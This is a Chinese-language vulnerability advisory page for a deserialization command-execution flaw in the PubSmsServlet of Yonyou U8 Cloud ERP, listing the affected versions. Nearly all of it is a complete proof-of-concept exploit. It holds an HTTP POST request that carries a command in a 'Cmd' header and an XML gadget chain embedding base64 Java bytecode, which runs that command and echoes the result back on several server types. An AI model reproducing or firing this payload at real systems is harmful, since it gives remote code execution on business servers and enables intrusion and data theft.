用友 U8 Cloud pubsmsservlet 代码执行漏洞

日期: 2025-10-16 | 影响软件: 用友U8 Cloud | POC: 已公开

漏洞描述

用友 U8 Cloud 是一种基于企业互联网理念设计的云 ERP 整体解决方案,集成了人力资源、财务会计、物流库存、客户关系和生产制造等功能,旨在推动企业实现敏捷经营、轻量化管理和简化IT操作,并提供安全可信、合规可靠的服务。用友 U8 Cloud 存在命令执行漏洞, 该漏洞源于 PubSmsServlet 在处理 XML 数据时,缺乏有效的类型验证和反序列化安全控制,导致攻击者可构造恶意数据实现任意对象创建从而获取系统权限。影响版本:用友 U8 Cloud 2.0 2.1 2.3 2.5 2.6 2.7 2.65 3.0 3.1 3.2 3.5 3.6 3.6sp 5.0 5.0sp 5.1 5.1sp

PoC代码

POST /servlet/pubsmsservlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Content-Type: application/xml
Cmd: whoami >./webapps/u8c_web/yu.txt

<map>
  <entry>
    <org.springframework.aop.target.HotSwappableTargetSource>
      <target class="com.fasterxml.jackson.databind.node.POJONode">
        <__value class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
          <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
            <default>
              <__name>ae62d68f-8c88-4ef9-895c-1bc8f9389640</__name>
              <__bytecodes>
                <byte-array>yv66vgAAADIBoAEAUW9yZy9hcGFjaGUvYmVhbnV0aWxzL2NveW90ZS9qc29uc2NoZW1hL0pzb25TY2hlbWFhMjQ0MGE5ZGVkOTI0OWRiODE1ZmI0YTBlZGE1MDA2ZgcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAZoZWFkZXIBABJMamF2YS9sYW5nL1N0cmluZzsBAAVkZWJ1ZwEAAVoBAARvbmNlAQAGPGluaXQ+AQADKClWDAAKAAsKAAQADAEAA3J1bgEAB2lzSmV0dHkBAAMoKVoMAA8AEAoAAgARAQAHZG9KZXR0eQwAEwALCgACABQMAAkACAkAAgAWAQAKaXNXZWJsb2dpYwwAGAAQCgACABkBAApkb1dlYmxvZ2ljDAAbAAsKAAIAHAEACGlzVG9tY2F0DAAeABAKAAIAHwEACGRvVG9tY2F0DAAhAAsKAAIAIgEACGlzU3ByaW5nDAAkABAKAAIAJQEACGRvU3ByaW5nDAAnAAsKAAIAKAEAE2phdmEvbGFuZy9FeGNlcHRpb24HACoBADlvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuUmVxdWVzdEF0dHJpYnV0ZXMIACwBAA9qYXZhL2xhbmcvQ2xhc3MHAC4BAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwAMAAxCgAvADIMAAcACAkAAgA0AQAQamF2YS9sYW5nL1N5c3RlbQcANgEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwwAOAA5CQA3ADoBACpbb25lLWZvci1hbGwtZWNob10gW2luaXRdIHRhcmdldCBpcyBzcHJpbmcIADwBABNqYXZhL2lvL1ByaW50U3RyZWFtBwA+AQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAQABBCgA/AEIBACx3ZWJsb2dpYy5zZXJ2bGV0LmludGVybmFsLlNlcnZsZXRSZXF1ZXN0SW1wbAgARAEALFtvbmUtZm9yLWFsbC1lY2hvXSBbaW5pdF0gdGFyZ2V0IGlzIHdlYmxvZ2ljCABGAQAlb3JnLmFwYWNoZS5jYXRhbGluYS5zdGFydHVwLkJvb3RzdHJhcAgASAEAKltvbmUtZm9yLWFsbC1lY2hvXSBbaW5pdF0gdGFyZ2V0IGlzIHRvbWNhdAgASgEAL29yZy5lY2xpcHNlLmpldHR5LnNlcnZsZXQuU2VydmxldENvbnRleHRIYW5kbGVyCABMAQApW29uZS1mb3ItYWxsLWVjaG9dIFtpbml0XSB0YXJnZXQgaXMgamV0dHkIAE4BAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAFABAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwBSAQAQamF2YS9sYW5nL1RocmVhZAcAVAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAVgBXCgBVAFgBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsMAFoAWwoAVQBcAQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAXgBfCgBVAGABABBqYXZhL2xhbmcvT2JqZWN0BwBiAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DABkAGUKAGMAZgEAB3RocmVhZHMIAGgBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABqAGsKAC8AbAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkBwBuAQANc2V0QWNjZXNzaWJsZQEABChaKVYMAHAAcQoAbwByAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAHQAdQoAbwB2AQATW0xqYXZhL2xhbmcvVGhyZWFkOwcAeAEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwwAegB7CgBVAHwBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgcAfgoAfwAMAQArW29uZS1mb3ItYWxsLWVjaG9dIFt0b21jYXRdIHRocmVhZCBuYW1lIC0+IAgAgQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwwAgwCECgB/AIUBAAh0b1N0cmluZwwAhwB7CgB/AIgBAARleGVjCACKAQAQamF2YS9sYW5nL1N0cmluZwcAjAEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDACOAI8KAI0AkAEABGh0dHAIAJIBAAZ0YXJnZXQIAJQBABJqYXZhL2xhbmcvUnVubmFibGUHAJYBAAZ0aGlzJDAIAJgBAAdoYW5kbGVyCACaAQANZ2V0U3VwZXJjbGFzcwwAnABlCgAvAJ0BAAZnbG9iYWwIAJ8BAApwcm9jZXNzb3JzCAChAQAOamF2YS91dGlsL0xpc3QHAKMBAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMAKUApgsApACnAQASamF2YS91dGlsL0l0ZXJhdG9yBwCpAQAHaGFzTmV4dAwAqwAQCwCqAKwBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMAK4ArwsAqgCwAQADcmVxCACyAQALZ2V0UmVzcG9uc2UIALQBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAC2ALcKAC8AuAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcAugEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAvAC9CgC7AL4BAAlnZXRIZWFkZXIIAMAMAAUABgkAAgDCAQAHaXNFbXB0eQwAxAAQCgCNAMUBAAlzZXRTdGF0dXMIAMcBABFqYXZhL2xhbmcvSW50ZWdlcgcAyQEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAywDMCQDKAM0BAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAzwDQCgDKANEBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwAigDTCgACANQBACRvcmcuYXBhY2hlLnRvbWNhdC51dGlsLmJ1Zi5CeXRlQ2h1bmsIANYBAD0oTGphdmEvbGFuZy9TdHJpbmc7WkxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KUxqYXZhL2xhbmcvQ2xhc3M7DAAwANgKAC8A2QEAC25ld0luc3RhbmNlDADbAK8KAC8A3AEACHNldEJ5dGVzCADeAQACW0IHAOABABFnZXREZWNsYXJlZE1ldGhvZAwA4gC3CgAvAOMBAAhnZXRCeXRlcwEABCgpW0IMAOUA5goAjQDnAQAHZG9Xcml0ZQgA6QEAE2phdmEubmlvLkJ5dGVCdWZmZXIIAOsBAAR3cmFwCADtAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwBwDvAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyBwDxAQAOZ2V0Q3VycmVudFdvcmsIAPMBABJnZXRNZXRob2RBbmRJbnZva2UBAF0oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAPUA9goAAgD3AQArW29uZS1mb3ItYWxsLWVjaG9dIFt3ZWJsb2dpY10gdW5rbm93biBlcnJvcggA+QoALwB8AQASU2VydmxldFJlcXVlc3RJbXBsCAD8AQAIZW5kc1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoMAP4A/woAjQEAAQARY29ubmVjdGlvbkhhbmRsZXIIAQIBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAQQBBQoAAgEGAQARZ2V0U2VydmxldFJlcXVlc3QIAQgBADFbb25lLWZvci1hbGwtZWNob10gW3dlYmxvZ2ljXSBlY2hvIGhlYWRlciBpcyBudWxsCAEKCgBjAIgBAC1bb25lLWZvci1hbGwtZWNob10gW3dlYmxvZ2ljXSBlY2hvIHJlc3VsdCAtPiAIAQ0BABZnZXRTZXJ2bGV0T3V0cHV0U3RyZWFtCAEPAQAjd2VibG9naWMueG1sLnV0aWwuU3RyaW5nSW5wdXRTdHJlYW0IAREBAAt3cml0ZVN0cmVhbQgBEwEAE2phdmEvaW8vSW5wdXRTdHJlYW0HARUBABZnZXREZWNsYXJlZENvbnN0cnVjdG9yAQAzKFtMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7DAEXARgKAC8BGQEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yBwEbAQAnKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DADbAR0KARwBHgEABWZsdXNoCAEgAQAJZ2V0V3JpdGVyCAEiAQAFd3JpdGUIASQBAAAIASYBAAx0aHJlYWRMb2NhbHMIASgBAAV0YWJsZQgBKgEAE1tMamF2YS9sYW5nL09iamVjdDsHASwBAAV2YWx1ZQgBLgEAE0FzeW5jSHR0cENvbm5lY3Rpb24IATABAApnZXRSZXF1ZXN0CAEyAQAOZ2V0UHJpbnRXcml0ZXIIATQBAAV1dGYtOAgBNgEAE2phdmEvaW8vUHJpbnRXcml0ZXIHATgKATkAQgEADkh0dHBDb25uZWN0aW9uCAE7AQAOZ2V0SHR0cENoYW5uZWwIAT0MASAACwoBOQE/AQAFY2xvc2UMAUEACwoBOQFCAQA8b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuY29udGV4dC5yZXF1ZXN0LlJlcXVlc3RDb250ZXh0SG9sZGVyCAFEAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMIAUYBAEBvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5jb250ZXh0LnJlcXVlc3QuU2VydmxldFJlcXVlc3RBdHRyaWJ1dGVzCAFIDAEkAEEKATkBSgEAEGdldE1ldGhvZEJ5Q2xhc3MBAFEoTGphdmEvbGFuZy9DbGFzcztMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAFcoTGphdmEvbGFuZy9DbGFzczwqPjtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczwqPjspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKALsAcgEAYChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczwqPjtbTGphdmEvbGFuZy9PYmpl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</byte-array>
              </__bytecodes>
              <__transletIndex>-1</__transletIndex>
              <__indentNumber>0</__indentNumber>
            </default>
            <boolean>false</boolean>
          </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
        </__value>
      </target>
    </org.springframework.aop.target.HotSwappableTargetSource>
    <org.springframework.aop.target.HotSwappableTargetSource reference="../org.springframework.aop.target.HotSwappableTargetSource"/>
  </entry>
  <entry>
    <org.springframework.aop.target.HotSwappableTargetSource>
      <target class="org.apache.xpath.objects.XString">
        <m__obj class="string"></m__obj>
      </target>
    </org.springframework.aop.target.HotSwappableTargetSource>
    <org.springframework.aop.target.HotSwappableTargetSource reference="../org.springframework.aop.target.HotSwappableTargetSource"/>
  </entry>
</map>

相关漏洞推荐